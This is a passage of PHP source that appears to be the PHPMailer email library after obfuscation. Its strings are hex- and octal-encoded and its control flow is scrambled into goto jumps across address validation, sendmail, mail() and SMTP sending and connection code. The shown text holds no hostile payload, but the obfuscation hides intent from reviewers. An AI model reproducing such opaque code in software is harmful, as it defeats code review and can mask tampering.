"\x5b\x21\x23\x2d\x27\52\x2b\134\57\x2d\71\x3d\77\x5e\55\176\x2d\135\53\174\42\x28\x3f\x3e\50\77\76\x5b\134\170\x30\61\55\x5c\x78\x30\70\134\170\x30\102\134\170\60\x43\134\170\x30\105\55\41\43\55\134\x5b\134\x5d\x2d\134\x78\67\106\x5d\174\x5c\x5c\133\134\x78\x30\x30\x2d\x5c\x78\x46\106\135\51\x29\52\42\51" . "\x28\77\x3e\x5c\x2e\50\x3f\76\133\41\x23\55\47\52\x2b\134\x2f\55\71\75\x3f\x5e\x2d\176\55\x5d\53\174\x22\50\77\x3e\x28\77\76\x5b\134\x78\60\x31\x2d\x5c\x78\60\70\134\170\x30\x42\134\x78\60\x43\134\170\x30\105\55\41\x23\x2d\134\x5b\x5c\x5d\55\134\170\x37\x46\x5d\x7c\x5c\134\x5b\x5c\x78\x30\x30\x2d\134\x78\106\106\135\x29\51\x2a\42\x29\51\x2a" . "\x40\x28\77\x3e\x28\x3f\x21\x5b\141\x2d\172\60\55\x39\x2d\135\x7b\x36\x34\54\175\51\50\77\x3e\133\141\x2d\x7a\60\55\x39\x5d\x28\x3f\x3e\133\x61\55\x7a\x30\x2d\71\x2d\135\x2a\x5b\x61\x2d\172\60\55\71\135\x29\x3f\51\x28\77\76\134\x2e\50\77\41\x5b\141\x2d\x7a\60\x2d\x39\55\135\173\66\x34\x2c\x7d\51" . "\50\77\x3e\133\141\x2d\x7a\60\55\x39\135\50\x3f\x3e\x5b\x61\x2d\172\x30\55\x39\55\135\52\x5b\x61\55\172\60\55\x39\135\51\77\x29\x29\x7b\60\54\61\x32\66\x7d\174\x5c\x5b\x28\77\72\x28\x3f\76\111\120\x76\66\72\x28\x3f\x3e\50\x3f\76\133\x61\55\x66\60\x2d\x39\135\173\61\54\64\x7d\51\x28\77\76\72" . "\133\141\55\146\x30\x2d\71\x5d\x7b\x31\54\x34\175\x29\173\x37\175\x7c\x28\x3f\41\50\x3f\72\x2e\x2a\133\141\x2d\x66\60\x2d\x39\135\133\x3a\134\135\x5d\51\x7b\70\x2c\175\x29\50\77\76\133\x61\55\146\60\x2d\x39\x5d\x7b\61\54\x34\x7d\x28\77\76\x3a\x5b\x61\x2d\x66\x30\55\x39\x5d\x7b\x31\54\x34\x7d\51\x7b\x30\54\x36\x7d\x29\x3f" . "\x3a\x3a\x28\77\76\x5b\141\x2d\x66\60\55\71\x5d\x7b\x31\54\x34\x7d\x28\x3f\76\x3a\133\x61\x2d\x66\x30\x2d\71\x5d\x7b\x31\x2c\x34\x7d\51\x7b\60\x2c\66\175\51\x3f\51\51\x7c\50\77\x3e\50\x3f\x3e\111\x50\166\66\x3a\x28\77\x3e\133\x61\x2d\x66\x30\x2d\71\135\173\61\54\64\x7d\50\x3f\x3e\72" . "\x5b\x61\55\x66\x30\x2d\71\x5d\x7b\61\x2c\x34\175\x29\173\65\175\72\x7c\50\77\41\x28\x3f\x3a\x2e\x2a\x5b\141\55\146\x30\x2d\x39\135\72\x29\x7b\x36\x2c\175\x29\x28\77\x3e\x5b\x61\x2d\x66\60\x2d\71\135\173\61\x2c\x34\x7d\x28\77\76\x3a\133\141\55\146\x30\55\x39\135\173\61\54\x34\x7d\x29\173\60\54\x34\x7d\x29\x3f" . "\x3a\x3a\50\77\76\x28\77\72\x5b\x61\55\146\60\x2d\x39\135\173\61\54\64\x7d\x28\77\76\72\133\x61\55\146\60\x2d\71\135\x7b\x31\54\x34\175\x29\173\x30\x2c\64\x7d\x29\x3a\51\x3f\51\x29\x3f\x28\77\76\x32\x35\133\60\x2d\65\135\x7c\62\x5b\x30\x2d\x34\x5d\x5b\60\55\x39\x5d\174\61\x5b\x30\55\x39\x5d\x7b\x32\175" . "\174\133\61\x2d\71\135\x3f\133\x30\x2d\71\x5d\51\50\x3f\x3e\134\56\50\x3f\76\62\65\x5b\x30\55\x35\x5d\x7c\62\133\x30\55\x34\x5d\x5b\60\55\71\x5d\174\x31\133\60\x2d\71\135\173\62\x7d\174\133\x31\x2d\x39\x5d\77\133\60\x2d\71\135\x29\x29\173\63\x7d\x29\51\x5c\x5d\51\x24\x2f\x69\x73\104", $address); case "\x68\164\x6d\x6c\x35": return (bool) preg_match("\x2f\x5e\133\x61\x2d\172\x41\55\x5a\60\55\71\x2e\x21\x23\x24\45\x26\x27\52\53\134\57\75\x3f\x5e\137\140\x7b\174\175\x7e\x2d\135\53\100\x5b\x61\55\172\101\55\x5a\x30\x2d\x39\135\50\77\72\x5b\141\x2d\x7a\x41\x2d\132\x30\55\71\55\x5d\173\x30\54\x36\61\175" . "\133\141\x2d\x7a\101\55\132\60\x2d\x39\135\51\x3f\50\77\72\134\56\x5b\x61\x2d\172\101\x2d\x5a\x30\x2d\71\x5d\50\77\72\x5b\141\x2d\x7a\101\55\x5a\x30\55\71\55\135\x7b\x30\54\x36\x31\x7d\133\141\x2d\172\101\55\x5a\60\x2d\x39\x5d\51\77\x29\x2a\44\57\163\104", $address); case "\156\157\162\x65\147\x65\170": return strlen($address) >= 3 and strpos($address, "\x40") >= 1 and strpos($address, "\x40") != strlen($address) - 1; case "\160\x68\160": default: return (bool) filter_var($address, FILTER_VALIDATE_EMAIL); } goto U2P_n; g8SSD: WK5z7: goto SIky2; dLK3b: if (!is_callable($patternselect)) { goto z7xfp; } goto cKZen; zeow2: $patternselect = "\x70\x68\x70"; goto NdZbZ; EDOm2: if (!(!$patternselect or $patternselect == "\141\165\164\157")) { goto BYsq3; } goto nmdkM; GXbLX: } public function idnSupported() { return function_exists("\151\x64\x6e\137\x74\x6f\137\x61\x73\x63\151\151") and function_exists("\x6d\142\137\x63\x6f\156\166\145\162\164\x5f\x65\156\143\157\144\x69\156\x67"); } public function punyencodeAddress($address) { goto DZBEj; mgg0H: mWaNn: goto JUWmW; nSEpS: return substr($address, 0, $pos) . $punycode; goto mgg0H; zUzCI: $domain = substr($address, ++$pos); goto Y7VKJ; CnlXw: if (!(($punycode = defined("\x49\116\x54\114\137\111\x44\116\x41\x5f\x56\101\x52\111\101\x4e\124\137\125\124\123\x34\66") ? idn_to_ascii($domain, 0, INTL_IDNA_VARIANT_UTS46) : idn_to_ascii($domain)) !== false)) { goto mWaNn; } goto nSEpS; JUWmW: gSXTg: goto zQfAL; DZBEj: if (!($this->idnSupported() and !empty($this->CharSet) and ($pos = strrpos($address, "\x40")) !== false)) { goto dlyR3; } goto zUzCI; Y7VKJ: if (!($this->has8bitChars($domain) and @mb_check_encoding($domain, $this->CharSet))) { goto gSXTg; } goto nP7F2; exkxa: return $address; goto ERDJ9; nP7F2: $domain = mb_convert_encoding($domain, "\125\x54\106\55\x38", $this->CharSet); goto CnlXw; zQfAL: dlyR3: goto exkxa; ERDJ9: } public function send() { try { goto pDwCs; DxqUG: return $this->postSend(); goto oeeSx; pDwCs: if ($this->preSend()) { goto jbIv5; } goto cTQz_; mFbbP: jbIv5: goto DxqUG; cTQz_: return false; goto mFbbP; oeeSx: } catch (phpmailerException $exc) { goto bv2Zd; KgSro: $this->setError($exc->getMessage()); goto LyqR4; yXSSI: throw $exc; goto MDswX; LyqR4: if (!$this->exceptions) { goto VzNgy; } goto yXSSI; bv2Zd: $this->mailHeader = ''; goto KgSro; MDswX: VzNgy: goto ZC1bq; ZC1bq: return false; goto d3g3o; d3g3o: } } public function preSend() { try { goto xEM9x; BuasM: YNq_H: goto ro_cH; yWJv6: PoUQY: goto wowh4; xVlcp: $this->MIMEHeader = $this->createHeader(); goto zqJBi; G4tuo: nheWh: goto Bs1KA; eqC2A: $this->MIMEHeader = rtrim($this->MIMEHeader, "\15\xa\x20") . self::CRLF . str_replace("\15\12", "\12", $header_dkim) . self::CRLF; goto SAak2; xEM9x: $this->error_count = 0; goto IoBzX; JxdTo: if (!(!$this->AllowEmpty and empty($this->Body))) { goto xo_fg; } goto rna6M; SAak2: aw2Cf: goto kTDIo; IoBzX: $this->mailHeader = ''; goto f6TRx; ZpHWL: kGWyj: goto yMN0A; jjDup: throw new phpmailerException($this->lang("\x70\x72\157\x76\x69\144\145\x5f\141\144\x64\162\145\x73\x73"), self::STOP_CRITICAL); goto G4tuo; p4UfY: ihlwK: goto HEs84; ro_cH: if (!(!empty($this->DKIM_domain) and !empty($this->DKIM_selector) and (!empty($this->DKIM_private_string) or !empty($this->DKIM_private) and self::isPermittedPath($this->DKIM_private) and file_exists($this->DKIM_private)))) { goto aw2Cf; } goto qWcHK; f6TRx: foreach (array_merge($this->RecipientsQueue, $this->ReplyToQueue) as $params) { goto XarMG; GgQNr: call_user_func_array(array($this, "\x61\x64\x64\x41\x6e\101\144\144\162\x65\163\163"), $params); goto SipHb; XarMG: $params[1] = $this->punyencodeAddress($params[1]); goto GgQNr; SipHb: FXtog: goto WZjJS; WZjJS: } goto p4UfY; zqJBi: $this->MIMEHeader .= $tempheaders; goto vz6Fb; yMN0A: if (!$this->alternativeExists()) { goto FKQ0L; } goto lDqWy; Phj_d: $this->mailHeader .= $this->headerLine("\124\x6f", "\x75\x6e\x64\x69\163\x63\x6c\x6f\x73\x65\144\55\162\145\143\x69\160\x69\x65\156\x74\x73\x3a\x3b"); goto vxRuM; HEs84: if (!(count($this->to) + count($this->cc) + count($this->bcc) < 1)) { goto nheWh; } goto jjDup; F6SPW: $this->MIMEHeader = ''; goto eiiV1; nbTAD: u5jos: goto p39JL; kTDIo: return true; goto qG6Xy; qNhCY: if (count($this->to) > 0) { goto PoUQY; } goto Phj_d; vz6Fb: if (!($this->Mailer == "\155\141\151\x6c")) { goto YNq_H; } goto qNhCY; lDqWy: $this->ContentType = "\x6d\x75\154\x74\151\x70\141\162\x74\x2f\141\x6c\x74\x65\162\156\141\164\x69\x76\x65"; goto I9vkQ; rna6M: throw new phpmailerException($this->lang("\x65\155\160\164\171\x5f\155\x65\163\x73\x61\x67\x65"), self::STOP_CRITICAL); goto x0WWV; x0WWV: xo_fg: goto F6SPW; wowh4: $this->mailHeader .= $this->addrAppend("\124\157", $this->to); goto nbTAD; NaOEC: $tempheaders = $this->MIMEHeader; goto xVlcp; vxRuM: goto u5jos; goto yWJv6; I9vkQ: FKQ0L: goto O8c1b; qWcHK: $header_dkim = $this->DKIM_Add($this->MIMEHeader . $this->mailHeader, $this->encodeHeader($this->secureHeader($this->Subject)), $this->MIMEBody); goto eqC2A; O8c1b: $this->setMessageType(); goto JxdTo; Bs1KA: foreach (array("\106\162\x6f\x6d", "\123\x65\x6e\x64\145\162", "\x43\x6f\x6e\x66\x69\x72\x6d\x52\145\x61\x64\151\x6e\147\124\157") as $address_kind) { goto iDoEZ; foFXB: goto Yb6Qh; goto wR7tM; iDoEZ: $this->{$address_kind} = trim($this->{$address_kind}); goto n_hQy; puFZW: return false; goto ZmyEf; MuXEN: Yb6Qh: goto Ztao_; jWqx3: $error_message = $this->lang("\x69\x6e\x76\141\154\151\144\x5f\x61\x64\x64\162\145\163\163") . "\x20\50\160\165\x6e\x79\105\x6e\x63\157\144\x65\51\x20" . $this->{$address_kind}; goto KuSEI; qS5LN: if ($this->validateAddress($this->{$address_kind})) { goto SbDvL; } goto jWqx3; J7Z5d: nBjpA: goto puFZW; eblrn: throw new phpmailerException($error_message); goto J7Z5d; vrCnj: $this->{$address_kind} = $this->punyencodeAddress($this->{$address_kind}); goto qS5LN; wR7tM: XltkN: goto vrCnj; Oho7S: $this->edebug($error_message); goto Wv75y; n_hQy: if (!empty($this->{$address_kind})) { goto XltkN; } goto foFXB; Wv75y: if (!$this->exceptions) { goto nBjpA; } goto eblrn; KuSEI: $this->setError($error_message); goto Oho7S; ZmyEf: SbDvL: goto MuXEN; Ztao_: } goto ZpHWL; eiiV1: $this->MIMEBody = $this->createBody(); goto NaOEC; p39JL: $this->mailHeader .= $this->headerLine("\123\x75\x62\152\145\143\164", $this->encodeHeader($this->secureHeader(trim($this->Subject)))); goto BuasM; qG6Xy: } catch (phpmailerException $exc) { goto lLFgZ; sE2Pv: if (!$this->exceptions) { goto tYoqv; } goto BoEO5; lLFgZ: $this->setError($exc->getMessage()); goto sE2Pv; F0x4J: tYoqv: goto OXgQ9; BoEO5: throw $exc; goto F0x4J; OXgQ9: return false; goto uo8Cl; uo8Cl: } } public function postSend() { try { goto X6n0M; nrLj6: OJ65Q: goto x_lJk; X6n0M: switch ($this->Mailer) { case "\163\x65\156\x64\155\x61\151\x6c": case "\x71\155\x61\x69\154": return $this->sendmailSend($this->MIMEHeader, $this->MIMEBody); case "\163\x6d\164\x70": return $this->smtpSend($this->MIMEHeader, $this->MIMEBody); case "\x6d\x61\x69\154": return $this->mailSend($this->MIMEHeader, $this->MIMEBody); default: goto qohnd; a6vsS: if (!method_exists($this, $sendMethod)) { goto ADIof; } goto IWSDV; qohnd: $sendMethod = $this->Mailer . "\x53\145\x6e\144"; goto a6vsS; b3n9r: ADIof: goto X2x1S; IWSDV: return $this->{$sendMethod}($this->MIMEHeader, $this->MIMEBody); goto b3n9r; X2x1S: return $this->mailSend($this->MIMEHeader, $this->MIMEBody); goto algQK; algQK: } goto nrLj6; x_lJk: FPZWf: goto bBud4; bBud4: } catch (phpmailerException $exc) { goto cuXtC; rUH31: throw $exc; goto v_M0r; cuXtC: $this->setError($exc->getMessage()); goto Teml5; Teml5: $this->edebug($exc->getMessage()); goto fve1g; v_M0r: kY42_: goto Zyqyc; fve1g: if (!$this->exceptions) { goto kY42_; } goto rUH31; Zyqyc: } return false; } protected function sendmailSend($header, $body) { goto muTZj; muTZj: if (!empty($this->Sender) and self::isShellSafe($this->Sender)) { goto zlt_L; } goto vChyt; cv6Ql: throw new phpmailerException($this->lang("\145\x78\x65\x63\165\x74\x65") . $this->Sendmail, self::STOP_CRITICAL); goto VVSMY; l3rrL: CXSgD: goto jO1d1; Ao5yr: $result = pclose($mail); goto H2CCP; vChyt: if ($this->Mailer == "\161\x6d\141\151\154") { goto CXSgD; } goto MPjaI; BL5vh: return true; goto VaYOV; Gzuun: foreach ($this->SingleToArray as $toAddr) { goto WUC0l; YETFm: rmVRV: goto iO1hY; pzets: throw new phpmailerException($this->lang("\x65\x78\x65\143\165\x74\x65") . $this->Sendmail, self::STOP_CRITICAL); goto fvaAy; WUC0l: if (@($mail = popen($sendmail, "\x77"))) { goto oYVZ5; } goto pzets; wH1JH: if (!($result != 0)) { goto KTGUS; } goto mgOAd; p1Aon: fputs($mail, $header); goto izrPl; hW1a1: $result = pclose($mail); goto iUkxB; rskuf: KTGUS: goto YETFm; iUkxB: $this->doCallback($result == 0, array($toAddr), $this->cc, $this->bcc, $this->Subject, $body, $this->From); goto wH1JH; mgOAd: throw new phpmailerException($this->lang("\145\170\145\143\165\x74\145") . $this->Sendmail, self::STOP_CRITICAL); goto rskuf; rqQf2: fputs($mail, "\x54\x6f\72\x20" . $toAddr . "\12"); goto p1Aon; fvaAy: oYVZ5: goto rqQf2; izrPl: fputs($mail, $body); goto hW1a1; iO1hY: } goto yrB8W; uA7BH: if ($this->SingleTo) { goto nZA84; } goto MyDfH; KWh8M: if ($this->Mailer == "\161\x6d\x61\151\x6c") { goto SW6G8; } goto wIoqD; wIoqD: $sendmailFmt = "\45\x73\40\x2d\157\151\x20\x2d\146\x25\163\40\55\164"; goto DJHBQ; VVSMY: Wx_I3: goto IOZd0; etmcz: PhPC9: goto Nh7xG; vkrCd: MY6Vz: goto c5yQO; uAYW_: zVkR5: goto gOdc5; jO1d1: $sendmailFmt = "\45\163"; goto uAYW_; MyDfH: if (@($mail = popen($sendmail, "\167"))) { goto Wx_I3; } goto cv6Ql; MPjaI: $sendmailFmt = "\45\x73\x20\55\x6f\151\40\55\x74"; goto mfcv1; yrB8W: pGVuc: goto YcuFu; IOZd0: fputs($mail, $header); goto lGeDj; qkS7u: SW6G8: goto D09iM; gOdc5: goto PhPC9; goto vIPkR; D09iM: $sendmailFmt = "\45\x73\40\x2d\146\45\x73"; goto hUFxR; vIPkR: zlt_L: goto KWh8M; DJHBQ: goto dPoDt; goto qkS7u; mfcv1: goto zVkR5; goto l3rrL; pXG8L: nZA84: goto Gzuun; c5yQO: goto cxyHE; goto pXG8L; rw_ty: throw new phpmailerException($this->lang("\145\170\x65\143\165\164\145") . $this->Sendmail, self::STOP_CRITICAL); goto vkrCd; H2CCP: $this->doCallback($result == 0, $this->to, $this->cc, $this->bcc, $this->Subject, $body, $this->From); goto PSocC; Nh7xG: $sendmail = sprintf($sendmailFmt, escapeshellcmd($this->Sendmail), $this->Sender); goto uA7BH; lGeDj: fputs($mail, $body); goto Ao5yr; PSocC: if (!($result != 0)) { goto MY6Vz; } goto rw_ty; YcuFu: cxyHE: goto BL5vh; hUFxR: dPoDt: goto etmcz; VaYOV: } protected static function isShellSafe($string) { goto IKMut; Mp5gU: return false; goto coc2V; f3QiC: $i++; goto xr33x; coc2V: nEXhD: goto WLaPX; hbKCq: return false; goto e2Dli; SxKUQ: $i = 0; goto C9zJE; e2Dli: OdRXu: goto za9Rm; IKMut: if (!(escapeshellcmd($string) !== $string or !in_array(escapeshellarg($string), array("\x27{$string}\47", "\x22{$string}\x22")))) { goto OdRXu; } goto hbKCq; ZEwt_: if (!(!ctype_alnum($c) && strpos("\x40\x5f\55\x2e", $c) === false)) { goto nEXhD; } goto Mp5gU; TJe8y: if (!($i < $length)) { goto MCgB2; } goto t2ff1; WLaPX: G5SxX: goto f3QiC; t2ff1: $c = $string[$i]; goto ZEwt_; za9Rm: $length = strlen($string); goto SxKUQ; Z7GF5: MCgB2: goto i83fU; xr33x: goto wCuUi; goto Z7GF5; i83fU: return true; goto ELNeD; C9zJE: wCuUi: goto TJe8y; ELNeD: } protected static function isPermittedPath($path) { return !preg_match("\43\136\133\141\55\x7a\x5d\53\x3a\57\x2f\43\x69", $path); } protected function mailSend($header, $body) { goto ysJxT; gDcPL: foreach ($toArr as $toAddr) { goto AfFj4; j_WQo: b_KfG: goto cfkz4; Fk7IX: $this->doCallback($result, array($toAddr), $this->cc, $this->bcc, $this->Subject, $body, $this->From); goto j_WQo; AfFj4: $result = $this->mailPassthru($toAddr, $this->Subject, $body, $header, $params); goto Fk7IX; cfkz4: } goto lxiZO; yarIY: Yf5Cn: goto B_mqa; Ly6IK: $params = null; goto bIEME; qmrCp: $to = implode("\54\x20", $toArr); goto Ly6IK; L6BJy: NZz2Z: goto dwuDw; AGH8n: return true; goto pp1q2; cXWqh: pvWoM: goto gDcPL; fpmNf: foreach ($this->to as $toaddr) { $toArr[] = $this->addrFormat($toaddr); s7UCi: } goto fpXcE; fpXcE: kac03: goto qmrCp; lxiZO: KaSjX: goto caDnK; H3GWa: if (!self::isShellSafe($this->Sender)) { goto Yf5Cn; } goto C2ITw; caDnK: VyjYn: goto g5TB1; KMq3L: ini_set("\163\145\156\144\x6d\141\151\154\137\x66\162\157\155", $old_from); goto G0BCR; Kilqd: throw new phpmailerException($this->lang("\x69\156\x73\x74\x61\156\x74\151\x61\164\145"), self::STOP_CRITICAL); goto bqOzx; Ctw9f: ini_set("\x73\145\156\144\x6d\141\151\x6c\x5f\x66\x72\x6f\155", $this->Sender); goto L6BJy; G0BCR: Xj1yV: goto o1vDT; o1vDT: if ($result) { goto wx9lg; } goto Kilqd; B_mqa: FDbgT: goto giYh_; g5TB1: if (!isset($old_from)) { goto Xj1yV; } goto KMq3L; giYh_: if (!(!empty($this->Sender) and !ini_get("\163\x61\146\x65\x5f\x6d\157\144\x65") and $this->validateAddress($this->Sender))) { goto NZz2Z; } goto jpN52; C2ITw: $params = sprintf("\55\x66\45\163", $this->Sender); goto yarIY; Ekvv_: if ($this->SingleTo and count($toArr) > 1) { goto pvWoM; } goto ohfcu; ohfcu: $result = $this->mailPassthru($to, $this->Subject, $body, $header, $params); goto ahbHB; ysJxT: $toArr = array(); goto fpmNf; xl5cp: goto VyjYn; goto cXWqh; bqOzx: wx9lg: goto AGH8n; jpN52: $old_from = ini_get("\163\145\x6e\144\x6d\x61\151\154\x5f\x66\x72\157\155"); goto Ctw9f; ahbHB: $this->doCallback($result, $this->to, $this->cc, $this->bcc, $this->Subject, $body, $this->From); goto xl5cp; bIEME: if (!(!empty($this->Sender) and $this->validateAddress($this->Sender))) { goto FDbgT; } goto H3GWa; dwuDw: $result = false; goto Ekvv_; pp1q2: } public function getSMTPInstance() { goto xgRUl; fR7n5: Tl7ND: goto O2A9I; xgRUl: if (is_object($this->smtp)) { goto Tl7ND; } goto wcQT7; O2A9I: return $this->smtp; goto L9B7X; wcQT7: $this->smtp = new SMTP(); goto fR7n5; L9B7X: } protected function smtpSend($header, $body) { goto E1InE; n5gb8: $smtp_from = $this->Sender; goto OzPCb; Y0kz3: throw new phpmailerException($this->lang("\x73\155\164\160\137\x63\157\156\156\145\x63\164\x5f\x66\141\151\x6c\145\144"), self::STOP_CRITICAL); goto OQvK2; MaHDK: throw new phpmailerException($this->ErrorInfo, self::STOP_CRITICAL); goto mQWnQ; E1InE: $bad_rcpt = array(); goto aJUTh; tAQq7: $errstr = ''; goto tf32Q; p_cfu: McPOc: goto PS4oc; OzPCb: BFJuT: goto dHHSc; mvb2x: throw new phpmailerException($this->lang("\144\x61\x74\x61\137\156\157\x74\x5f\141\143\143\x65\160\x74\x65\x64"), self::STOP_CRITICAL); goto SIwoi; Eegpt: $this->smtp->reset(); goto yyWwX; oEJTt: HYdJ1: goto xXyA6; ZkIyL: foreach (array($this->to, $this->cc, $this->bcc) as $togroup) { goto uUmcP; T8HNg: SGKmR: goto i4fwV; PTsOb: t4DYy: goto T8HNg; uUmcP: foreach ($togroup as $to) { goto XWbPW; MG7wH: fi4G_: goto XfQvK; wNlVA: $error = $this->smtp->getError(); goto JHOf3; o781W: $isSent = false; goto tuoIf; XWbPW: if (!$this->smtp->recipient($to[0])) { goto yHN2H; } goto kuHYd; YT9lN: $this->doCallback($isSent, array($to[0]), array(), array(), $this->Subject, $body, $this->From); goto MG7wH; kGCrE: yHN2H: goto wNlVA; kuHYd: $isSent = true; goto t4W5h; JHOf3: $bad_rcpt[] = array("\x74\157" => $to[0], "\145\x72\x72\157\x72" => $error["\144\x65\x74\x61\151\154"]); goto o781W; tuoIf: O5oGN: goto YT9lN; t4W5h: goto O5oGN; goto kGCrE; XfQvK: } goto PTsOb; i4fwV: } goto oEJTt; PS4oc: return true; goto Wup4A; omLNA: throw new phpmailerException($this->lang("\x72\x65\x63\151\160\x69\x65\x6e\164\x73\x5f\x66\x61\151\154\x65\x64") . $errstr, self::STOP_CONTINUE); goto p_cfu; aJUTh: if ($this->smtpConnect($this->SMTPOptions)) { goto gapIm; } goto Y0kz3; V1XIv: $this->smtp->quit(); goto TGL1c; TGL1c: $this->smtp->close(); goto lO8Rx; tf32Q: foreach ($bad_rcpt as $bad) { $errstr .= $bad["\x74\x6f"] . "\72\40" . $bad["\x65\x72\x72\x6f\162"]; xvNOA: } goto TLZ1b; mQWnQ: vJXW2: goto ZkIyL; dHHSc: if ($this->smtp->mail($smtp_from)) { goto vJXW2; } goto IdvtU; lO8Rx: goto ifnDc; goto Gbs8i; IdvtU: $this->setError($this->lang("\146\x72\157\x6d\137\146\x61\151\x6c\145\x64") . $smtp_from . "\40\x3a\40" . implode("\x2c", $this->smtp->getError())); goto MaHDK; f5tnr: goto BFJuT; goto sboR_; cOIRG: if (!(count($bad_rcpt) > 0)) { goto McPOc; } goto tAQq7; yyWwX: ifnDc: goto cOIRG; xXyA6: if (!(count($this->all_recipients) > count($bad_rcpt) and !$this->smtp->data($header . $body))) { goto OzuCh; } goto mvb2x; SIwoi: OzuCh: goto vT3xl; sboR_: mFXI8: goto n5gb8; vT3xl: if ($this->SMTPKeepAlive) { goto tBYG3; } goto V1XIv; uuBUp: $smtp_from = $this->From; goto f5tnr; M0iRI: if (!empty($this->Sender) and $this->validateAddress($this->Sender)) { goto mFXI8; } goto uuBUp; OQvK2: gapIm: goto M0iRI; Gbs8i: tBYG3: goto Eegpt; TLZ1b: kD0wz: goto omLNA; Wup4A: } public function smtpConnect($options = null) { goto xBm9X; g_a3B: SOD9G: goto gKaUg; AC0Nc: if (!($this->exceptions and !is_null($lastexception))) { goto lltPl; } goto u2vdV; hnqbu: $this->smtp->setDebugLevel($this->SMTPDebug); goto sIRx8; vAljP: if (!is_null($options)) { goto WUt0m; } goto LuUE3; DrUPP: $this->smtp->close(); goto AC0Nc; mbJoq: lltPl: goto A8OF2; LuUE3: $options = $this->SMTPOptions; goto axwMD; FPTNK: foreach ($hosts as $hostentry) { goto V1DeS; GUt8O: if ($sslext) { goto m5Dpx; } goto pbgLz; pHhO8: if (!$this->smtp->connect($prefix . $host, $port, $this->Timeout, $options)) { goto sA2Om; } goto IjU9J; M_cA2: $this->edebug("\x49\x67\x6e\x6f\x72\151\x6e\x67\x20\151\156\166\141\x6c\151\144\40\150\157\x73\x74\72\40" . $hostentry); goto NJBYU; I3KZg: $prefix = "\x73\163\x6c\x3a\x2f\x2f"; goto oF8wf; UYegR: $secure = "\164\154\x73"; goto cvlil; Is_Rt: o2Fua: goto SwQCH; IjU9J: try { goto LNFt3; hJwfB: if (!($this->SMTPAutoTLS and $sslext and $secure != "\x73\163\154" and $this->smtp->getServerExt("\123\x54\x41\122\x54\x54\114\x53"))) { goto GOWgG; } goto x_D7G; khsxs: ifKjt: goto GhImm; gef7F: throw new phpmailerException($this->lang("\x61\x75\164\x68\x65\x6e\x74\151\143\x61\x74\145")); goto cJtfX; GhImm: return true; goto m70Bj; eoqWG: Q6OHO: goto UTSqE; UTSqE: if (!$this->SMTPAuth) { goto ifKjt; } goto hmGQ4; KaDu8: $this->smtp->hello($hello); goto hJwfB; oZYJw: $this->smtp->hello($hello); goto eoqWG; TJSq1: goto yoGEo; goto ECZxr; hmGQ4: if ($this->smtp->authenticate($this->Username, $this->Password, $this->AuthType, $this->Realm, $this->Workstation)) { goto HWsjY; } goto gef7F; nCM0a: $hello = $this->Helo; goto ur4Ra; i31Tn: if (!$tls) { goto Q6OHO; } goto hZs5t; rgBQn: GOWgG: goto i31Tn; ECZxr: syero: goto nCM0a; VPIxn: $hello = $this->serverHostname(); goto TJSq1; yBHL9: throw new phpmailerException($this->lang("\x63\x6f\x6e\156\x65\x63\164\137\150\157\x73\164")); goto KHvRP; hZs5t: if ($this->smtp->startTLS()) { goto owGUf; } goto yBHL9; KHvRP: owGUf: goto oZYJw; x_D7G: $tls = true; goto rgBQn; cJtfX: HWsjY: goto khsxs; ur4Ra: yoGEo: goto KaDu8; LNFt3: if ($this->Helo) { goto syero; } goto VPIxn; m70Bj: } catch (phpmailerException $exc) { goto Msdw1; ELoD9: $this->smtp->quit(); goto BRYkJ; UCg0f: $this->edebug($exc->getMessage()); goto ELoD9; Msdw1: $lastexception = $exc; goto UCg0f; BRYkJ: } goto FJFz9; V05v7: if (!($tport > 0 and $tport < 65536)) { goto aRYQa; } goto CnHBQ; KxGaD: $sslext = defined("\117\120\x45\116\123\x53\x4c\x5f\x41\x4c\107\117\137\x53\110\101\x31"); goto ZXh2z; uIa3f: $secure = $this->SMTPSecure; goto SOWr4; gIdrj: $port = $this->Port; goto ZE8wm; XZO4R: RTCPq: goto rnt0S; V1DeS: $hostinfo = array(); goto hKp86; SwQCH: $tls = true; goto UYegR; TPGBE: goto RRhW0; goto rwwL0; oF8wf: $tls = false; goto yAi0S; GbVXh: aRYQa: goto pHhO8; ZE8wm: $tport = (int) $hostinfo[4]; goto V05v7; FJFz9: sA2Om: goto iwB4C; SOWr4: $tls = $this->SMTPSecure == "\164\x6c\163"; goto Fo8Zl; hKp86: if (preg_match("\x2f\136\x28\x28\163\x73\154\x7c\x74\154\x73\x29\x3a\134\x2f\134\57\51\x2a\50\133\141\x2d\x7a\101\x2d\x5a\x30\55\71\134\56\55\135\52\174\x5c\133\133\141\x2d\x66\101\x2d\106\x30\55\71\72\x5d\53\134\135\x29\72\77\x28\x5b\x30\x2d\x39\135\52\51\44\57", trim($hostentry), $hostinfo)) { goto sNh_2; } goto M_cA2; USGFS: $prefix = ''; goto uIa3f; CnHBQ: $port = $tport; goto GbVXh; cMw6H: goto RRhW0; goto Is_Rt; ZXh2z: if (!("\164\154\x73" === $secure or "\x73\163\154" === $secure)) { goto RTCPq; } goto GUt8O; NJBYU: goto H80_8; goto jzjJQ; rwwL0: yNym4: goto I3KZg; lx8O0: if ($hostinfo[2] == "\164\x6c\163") { goto o2Fua; } goto TPGBE; rnt0S: $host = $hostinfo[3]; goto gIdrj; pbgLz: throw new phpmailerException($this->lang("\145\170\x74\145\156\x73\151\x6f\x6e\x5f\x6d\x69\163\x73\151\x6e\147") . "\x6f\160\145\x6e\163\x73\x6c", self::STOP_CRITICAL); goto qkjxd; yAi0S: $secure = "\x73\163\x6c"; goto cMw6H; qkjxd: m5Dpx: goto XZO4R; jzjJQ: sNh_2: goto USGFS; Fo8Zl: if ("\163\163\154" == $hostinfo[2] or '' == $hostinfo[2] and "\163\163\x6c" == $this->SMTPSecure) { goto yNym4; } goto lx8O0; cvlil: RRhW0: goto KxGaD; iwB4C: H80_8: goto yCoxK; yCoxK: } goto thWTq; v_2hS: $lastexception = null; goto FPTNK; gKaUg: $this->smtp->setTimeout($this->Timeout); goto hnqbu; S2tDz: return true; goto g_a3B; thWTq: nLYxx: goto DrUPP; MQcMU: oVnoa: goto vAljP; axwMD: WUt0m: goto hKhMI; v1Rut: $hosts = explode("\73", $this->Host); goto v_2hS; xBm9X: if (!is_null($this->smtp)) { goto oVnoa; } goto Ql_0B; Ql_0B: $this->smtp = $this->getSMTPInstance(); goto MQcMU; A8OF2: return false; goto lkxtm; hKhMI: if (!$this->smtp->connected()) { goto SOD9G; } goto S2tDz; u2vdV: throw $lastexception; goto mbJoq; mibRW: $this->smtp->setVerp($this->do_verp); goto v1Rut; sIRx8: $this->smtp->setDebugOutput($this->Debugoutput); 